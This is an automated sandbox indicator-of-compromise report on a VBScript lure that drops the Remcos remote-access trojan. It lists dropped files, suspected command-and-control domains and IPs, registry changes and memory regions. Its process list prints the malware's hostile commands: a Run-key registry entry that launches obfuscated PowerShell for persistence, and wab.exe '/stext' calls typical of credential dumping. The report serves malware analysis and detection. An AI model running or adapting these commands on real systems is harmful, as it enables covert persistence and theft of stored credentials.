IOC Report
REVISED NEW ORDER 7936-2024.vbs

Files

File Path | Type | Category | Malicious
REVISED NEW ORDER 7936-2024.vbs | ASCII text, with CRLF line terminators | initial sample | malicious
C:\ProgramData\remcos\logs.dat | data | dropped | malicious
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 | Microsoft Cabinet archive data, Windows 2000/XP setup, 69993 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression | dropped | malicious
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 | data | dropped |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\json[1].json | JSON data | dropped |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache | data | modified |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | data | dropped |
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2s1cjq5i.guo.psm1 | ASCII text, with no line terminators | dropped |
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4iryjg50.bi0.ps1 | ASCII text, with no line terminators | dropped |
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ajeqfl5s.zwa.psm1 | ASCII text, with no line terminators | dropped |
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ivj52lbz.scn.ps1 | ASCII text, with no line terminators | dropped |
C:\Users\user\AppData\Local\Temp\bhv8461.tmp | Extensible storage engine DataBase, version 0x620, checksum 0xf663cf20, page size 32768, DirtyShutdown, Windows version 10.0 | dropped |
C:\Users\user\AppData\Local\Temp\peqezcketotthbxautag | Unicode text, UTF-16, little-endian text, with no line terminators | dropped |
C:\Users\user\AppData\Roaming\deklaration.Sup | ASCII text, with very long lines (65536), with no line terminators | dropped |
There are 213 hidden files.

Processes

Path | Cmdline | Malicious
C:\Windows\System32\wscript.exe | C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\REVISED NEW ORDER 7936-2024.vbs" | malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |  | malicious
C:\Windows\System32\cmd.exe | "C:\Windows\system32\cmd.exe" /c "echo %appdata%\deklaration.Sup && echo $" | malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Feltb3afs.ib2Oceano5Be,how8Catato0Dovens7Sympto, Knepp2Celleo9Pipist1Goersw2,ibbon0U.iver) ,oate ');Ordonnant $Euryaleae;"
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\deklaration.Sup && echo $"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Nuchale" /t REG_EXPAND_SZ /d "%Piptadenia% -w 1 $Negerens127=(Get-ItemProperty -Path 'HKCU:\Sortiment\').Anadems;%Piptadenia% ($Negerens127)"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\peqezcketotthbxautag"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\aywoauvyhwlgrptelemijrt"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\cajhaffzuedltvhiuphbmeobpae"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Nuchale" /t REG_EXPAND_SZ /d "%Piptadenia% -w 1 $Negerens127=(Get-ItemProperty -Path 'HKCU:\Sortiment\').Anadems;%Piptadenia% ($Negerens127)"

URLs


Domains

| Name | IP | Malicious |
| bg.microsoft.map.fastly.net | 199.232.214.172 | |
| paygateme.net | 146.70.57.34 | |
| geoplugin.net | 178.237.33.50 | |

IPs

| IP | Domain | Country | Malicious |
| 87.121.105.184 | unknown | Bulgaria | |
| 178.237.33.50 | geoplugin.net | Netherlands | |
| 146.70.57.34 | paygateme.net | United Kingdom | |

Registry

| Path | Value | Malicious |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | EnableFileTracing | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | EnableAutoFileTracing | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | EnableConsoleTracing | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | FileTracingMask | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | ConsoleTracingMask | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | MaxFileSize | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 | FileDirectory | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | EnableFileTracing | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | EnableAutoFileTracing | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | EnableConsoleTracing | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | FileTracingMask | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | ConsoleTracingMask | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | MaxFileSize | |
| HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS | FileDirectory | |
| HKEY_CURRENT_USER\Sortiment | Anadems | |
| HKEY_CURRENT_USER\Environment | Piptadenia | |
| HKEY_CURRENT_USER\SOFTWARE\Rmc-WTDTSU | exepath | |
| HKEY_CURRENT_USER\SOFTWARE\Rmc-WTDTSU | licence | |
| HKEY_CURRENT_USER\SOFTWARE\Rmc-WTDTSU | time | |
| HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | Nuchale | |

Memdumps

33A4000
heap
page read and write
A8A000
heap
page read and write
6604000
heap
page read and write
A1D000
heap
page read and write
1ABE8833000
heap
page read and write
8739000
trusted library allocation
page read and write
644000
heap
page read and write
2FB0000
heap
page read and write
4641000
heap
page read and write
2F49000
stack
page read and write
644000
heap
page read and write
A10000
heap
page read and write
10F000
stack
page read and write
7FFD9B983000
trusted library allocation
page execute and read and write
B90000
trusted library allocation
page read and write
35CC000
heap
page read and write
645000
heap
page read and write
61C35FF000
stack
page read and write
9D7000
heap
page read and write
1ABE884B000
heap
page read and write
A39000
heap
page read and write
907E000
heap
page read and write
33A4000
heap
page read and write
29CD000
stack
page read and write
A19000
heap
page read and write
4641000
heap
page read and write
456A000
heap
page read and write
4881000
heap
page read and write
CC3B5FE000
stack
page read and write
46EE000
stack
page read and write
2B8D000
stack
page read and write
7FFD9BA36000
trusted library allocation
page read and write
1ABE88C6000
heap
page read and write
8543000
trusted library allocation
page read and write
487F000
stack
page read and write
640000
heap
page read and write
7FFD9BC00000
trusted library allocation
page read and write
94C0000
direct allocation
page read and write
7175000
heap
page read and write
2277E000
heap
page read and write
35C3000
heap
page read and write
DC000
stack
page read and write
6613000
heap
page read and write
6630000
heap
page read and write
35C0000
heap
page read and write
A50000
trusted library allocation
page read and write
6624000
heap
page read and write
1ABE88B3000
heap
page read and write
6613000
heap
page read and write
7FFD9B98D000
trusted library allocation
page execute and read and write
2B7AA211000
trusted library allocation
page read and write
7350000
trusted library allocation
page read and write
7FFD9BCA0000
trusted library allocation
page read and write
6FAE000
stack
page read and write
22671000
heap
page read and write
1ABE682E000
heap
page read and write
1ABE88B8000
heap
page read and write
1ABE88C7000
heap
page read and write
BFE000
stack
page read and write
3260000
heap
page read and write
1ABE67A3000
heap
page read and write
22580000
heap
page read and write
1ABE895B000
heap
page read and write
AD000
stack
page read and write
880000
heap
page read and write
1ABE88C6000
heap
page read and write
210000
heap
page read and write
B72000
trusted library allocation
page read and write
7FFD9BC30000
trusted library allocation
page read and write
2B7AA3EA000
trusted library allocation
page read and write
61C3BFB000
stack
page read and write
84C05FD000
stack
page read and write
1ABE8874000
heap
page read and write
C80000
heap
page read and write
7FFD9BC50000
trusted library allocation
page read and write
6615000
heap
page read and write
4A80000
trusted library allocation
page read and write
57C1000
trusted library allocation
page read and write
1ABE86FA000
heap
page read and write
2B7A67A0000
heap
page read and write
7FFD9BBF0000
trusted library allocation
page read and write
323E000
stack
page read and write
4881000
heap
page read and write
2D8E000
stack
page read and write
2C50000
heap
page read and write
2B7C09C2000
heap
page read and write
1ABE682E000
heap
page read and write
1ABE67E9000
heap
page read and write
1ABE6A18000
heap
page read and write
A00000
heap
page read and write
1ABE8711000
heap
page read and write
22C7E000
heap
page read and write
2B7A667E000
heap
page read and write
9038000
heap
page read and write
1ABE8863000
heap
page read and write
1ABE8930000
heap
page read and write
1ABE86E0000
heap
page read and write
6624000
heap
page read and write
1E0000
heap
page read and write
2B7C0998000
heap
page read and write
6C3A000
stack
page read and write
B70000
trusted library allocation
page read and write
5171000
heap
page read and write
2DD0000
heap
page read and write
1E1587A5000
heap
page read and write
1ABE8739000
heap
page read and write
2B7A81C0000
heap
page read and write
8031000
trusted library allocation
page read and write
7165000
heap
page read and write
645000
heap
page read and write
72CF000
stack
page read and write
A19000
heap
page read and write
2CC4000
heap
page read and write
1ABE6730000
heap
page read and write
1ABE88E1000
heap
page read and write
1ABE881F000
heap
page read and write
1ABE8893000
heap
page read and write
23180000
heap
page read and write
2CA0000
heap
page read and write
1ABE67CA000
heap
page read and write
1ABE89B6000
heap
page read and write
1ABE88E1000
heap
page read and write
2B7C06F0000
heap
page read and write
2B7C068E000
heap
page read and write
4889000
heap
page read and write
710D000
heap
page read and write
51C000
stack
page read and write
1ABE6822000
heap
page read and write
33A4000
heap
page read and write
1ABE88CA000
heap
page read and write
4888000
heap
page read and write
6B60000
direct allocation
page read and write
1ABE88B3000
heap
page read and write
22C15000
heap
page read and write
7FFD9BC10000
trusted library allocation
page read and write
87E000
stack
page read and write
2B7A8CBE000
trusted library allocation
page read and write
2B7C0770000
heap
page execute and read and write
9030000
heap
page read and write
9460000
trusted library allocation
page read and write
2B7A80B0000
trusted library allocation
page read and write
7173000
heap
page read and write
336F000
stack
page read and write
A97000
heap
page read and write
A01000
heap
page read and write
1ABE88CE000
heap
page read and write
A1D000
heap
page read and write
A28000
heap
page read and write
1ABE6783000
heap
page read and write
2C3D000
stack
page read and write
1ABE8711000
heap
page read and write
1ABE88B8000
heap
page read and write
1ABE67BE000
heap
page read and write
A97000
heap
page read and write
2B7A8B06000
trusted library allocation
page read and write
1ABE86E2000
heap
page read and write
582A000
trusted library allocation
page read and write
1ABE88BD000
heap
page read and write
2B7A9F8D000
trusted library allocation
page read and write
22571000
heap
page read and write
481D000
trusted library allocation
page read and write
1ABE67CA000
heap
page read and write
57E9000
trusted library allocation
page read and write
7F95000
trusted library allocation
page read and write
2B7A6820000
trusted library allocation
page read and write
CC3AEFE000
stack
page read and write
22DFD000
heap
page read and write
2FB0000
heap
page read and write
A19000
heap
page read and write
7FFD9BBE0000
trusted library allocation
page read and write
1DE000
stack
page read and write
2CC2000
heap
page read and write
1ABE88B3000
heap
page read and write
1ABE8882000
heap
page read and write
9DF000
stack
page read and write
2C4E000
unkown
page read and write
2B7A67E0000
trusted library allocation
page read and write
22671000
heap
page read and write
2B7C09A7000
heap
page read and write
41B000
system
page execute and read and write
1ABE682E000
heap
page read and write
456000
system
page execute and read and write
55D000
stack
page read and write
A60000
heap
page read and write
A8A000
heap
page read and write
1ABE88AD000
heap
page read and write
1ABE6A19000
heap
page read and write
1ABE88BB000
heap
page read and write
2B7A86FB000
trusted library allocation
page read and write
1ABE881A000
heap
page read and write
2B7B84DB000
trusted library allocation
page read and write
5E0000
trusted library allocation
page read and write
A01000
heap
page read and write
1ABE678E000
heap
page read and write
1ABE8833000
heap
page read and write
1ABE67F4000
heap
page read and write
1ABE67CA000
heap
page read and write
9EC3000
direct allocation
page execute and read and write
32A8000
heap
page read and write
4D38000
heap
page read and write
22571000
heap
page read and write
B2C3000
direct allocation
page execute and read and write
1ABE8813000
heap
page read and write
87BC000
trusted library allocation
page read and write
9E0000
heap
page read and write
61C36FE000
stack
page read and write
C3E000
stack
page read and write
2B7A68B0000
heap
page execute and read and write
71E7000
trusted library allocation
page read and write
728E000
stack
page read and write
400000
system
page execute and read and write
2DE0000
heap
page read and write
1E1585E0000
heap
page read and write
7FFC000
stack
page read and write
1ABE8814000
heap
page read and write
A05000
heap
page read and write
1ABE69C0000
remote allocation
page read and write
6616000
heap
page read and write
1ABE882D000
heap
page read and write
1ABE8848000
heap
page read and write
A1C000
heap
page read and write
33DC000
heap
page read and write
A30000
trusted library allocation
page read and write
1ABE87E1000
heap
page read and write
A01000
heap
page read and write
6B80000
direct allocation
page read and write
9DE000
heap
page read and write
1ABE88A6000
heap
page read and write
84C08FF000
unkown
page read and write
7FFD9BA3C000
trusted library allocation
page execute and read and write
23303000
heap
page read and write
1AE000
stack
page read and write
7F10000
heap
page read and write
1ABE6783000
heap
page read and write
6FC1000
heap
page read and write
7FFD9BBC0000
trusted library allocation
page read and write
1ABE8882000
heap
page read and write
944C000
stack
page read and write
2382F000
heap
page read and write
4880000
heap
page read and write
71B0000
trusted library allocation
page read and write
462E000
stack
page read and write
3190000
heap
page readonly
1ABE88C7000
heap
page read and write
3110000
heap
page read and write
6EAA000
stack
page read and write
1ABE8807000
heap
page read and write
303C000
stack
page read and write
A29000
heap
page read and write
1ABE67CC000
heap
page read and write
1ABE880A000
heap
page read and write
A2B000
heap
page read and write
46AE000
stack
page read and write
2FB8000
heap
page read and write
1ABE86FD000
heap
page read and write
A0E000
heap
page read and write
662C000
heap
page read and write
1ABE882B000
heap
page read and write
2330C000
heap
page read and write
7F0E000
stack
page read and write
A28000
heap
page read and write
52AE000
stack
page read and write
A11000
heap
page read and write
1ABE8739000
heap
page read and write
7400000
trusted library allocation
page read and write
94D0000
direct allocation
page read and write
5171000
heap
page read and write
2362C000
heap
page read and write
B4C000
heap
page read and write
1ABE69C0000
remote allocation
page read and write
180000
heap
page read and write
2B7C09B7000
heap
page read and write
93C0000
trusted library allocation
page read and write
A19000
heap
page read and write
6630000
heap
page read and write
1ABE8711000
heap
page read and write
23697000
heap
page read and write
2B7AA19F000
trusted library allocation
page read and write
A11000
heap
page read and write
A2C000
heap
page read and write
9074000
heap
page read and write
1ABE86E5000
heap
page read and write
2B7C0971000
heap
page read and write
2B7C0C50000
heap
page read and write
7FFD9B990000
trusted library allocation
page read and write
644000
heap
page read and write
9F0000
heap
page read and write
2B7A6560000
heap
page read and write
9D9000
heap
page read and write
A11000
heap
page read and write
1ABE86ED000
heap
page read and write
5170000
heap
page read and write
70B9000
heap
page read and write
6615000
heap
page read and write
2B7B81D1000
trusted library allocation
page read and write
A59000
trusted library allocation
page read and write
6604000
heap
page read and write
6B90000
direct allocation
page read and write
22C7E000
heap
page read and write
220000
heap
page read and write
1ABE8814000
heap
page read and write
A08000
heap
page read and write
734D000
stack
page read and write
33A4000
heap
page read and write
33A4000
heap
page read and write
22585000
heap
page read and write
2B7C0950000
heap
page read and write
1ABE88A3000
heap
page read and write
1ABE8833000
heap
page read and write
7E40000
trusted library allocation
page execute and read and write
1ABE6737000
heap
page read and write
1ABE8882000
heap
page read and write
1ABE67CC000
heap
page read and write
1ABE8880000
heap
page read and write
1ABE88CB000
heap
page read and write
A0E000
heap
page read and write
2B7AA3D6000
trusted library allocation
page read and write
22C14000
heap
page read and write
7FFD9BD00000
trusted library allocation
page read and write
A20000
trusted library section
page read and write
2B7A68D5000
heap
page read and write
7FFD9BB31000
trusted library allocation
page read and write
5E0000
heap
page read and write
2B7AA1B6000
trusted library allocation
page read and write
2B7C0629000
heap
page read and write
1ABE8887000
heap
page read and write
A01000
heap
page read and write
A0F000
heap
page read and write
A87000
heap
page read and write
A79000
heap
page read and write
2B7C0949000
heap
page read and write
6604000
heap
page read and write
CC3B4FE000
stack
page read and write
2B7C0620000
heap
page read and write
22DFF000
heap
page read and write
1ABE86E4000
heap
page read and write
2E6F000
stack
page read and write
ECC000
stack
page read and write
BCC3000
direct allocation
page execute and read and write
6621000
heap
page read and write
33C8000
heap
page read and write
22585000
heap
page read and write
4A80000
trusted library allocation
page read and write
A10000
heap
page read and write
1ABE88E1000
heap
page read and write
7FFD9BB70000
trusted library allocation
page execute and read and write
7410000
trusted library allocation
page read and write
644000
heap
page read and write
A19000
heap
page read and write
71F0000
trusted library allocation
page read and write
2B7A9D9C000
trusted library allocation
page read and write
33A0000
heap
page read and write
1ABE8882000
heap
page read and write
22671000
heap
page read and write
CC3C1CA000
stack
page read and write
7F3D0000
trusted library allocation
page execute and read and write
7ECD000
stack
page read and write
662C000
heap
page read and write
1ABE88CA000
heap
page read and write
A23000
heap
page read and write
662A000
heap
page read and write
7FFD9BC90000
trusted library allocation
page read and write
6624000
heap
page read and write
1ABE67CA000
heap
page read and write
23B0000
heap
page read and write
6603000
heap
page read and write
A28000
heap
page read and write
1ABE884B000
heap
page read and write
6CD0000
heap
page read and write
1ABE67FE000
heap
page read and write
4881000
heap
page read and write
71D0000
trusted library allocation
page read and write
1ABE890C000
heap
page read and write
6613000
heap
page read and write
73B0000
trusted library allocation
page read and write
F0E000
stack
page read and write
2B7C0623000
heap
page read and write
1E158410000
heap
page read and write
A00000
heap
page read and write
1E1583F0000
heap
page read and write
1ABE682E000
heap
page read and write
2B7A6706000
heap
page read and write
2C9E000
stack
page read and write
1ABE8833000
heap
page read and write
1ABE884B000
heap
page read and write
1ABE8876000
heap
page read and write
229F1000
heap
page read and write
1ABE88A6000
heap
page read and write
8010000
trusted library allocation
page execute and read and write
2FD0000
heap
page read and write
A80000
heap
page read and write
2CAB000
heap
page read and write
7FFD9BB20000
trusted library allocation
page read and write
7FFD9BB62000
trusted library allocation
page read and write
905B000
heap
page read and write
6B50000
direct allocation
page read and write
1ABE6783000
heap
page read and write
645000
heap
page read and write
A00000
heap
page read and write
A1C000
heap
page read and write
1ABE88E0000
heap
page read and write
2B7A8255000
trusted library allocation
page read and write
F10000
trusted library allocation
page read and write
There are 938 hidden memdumps, click here to show them.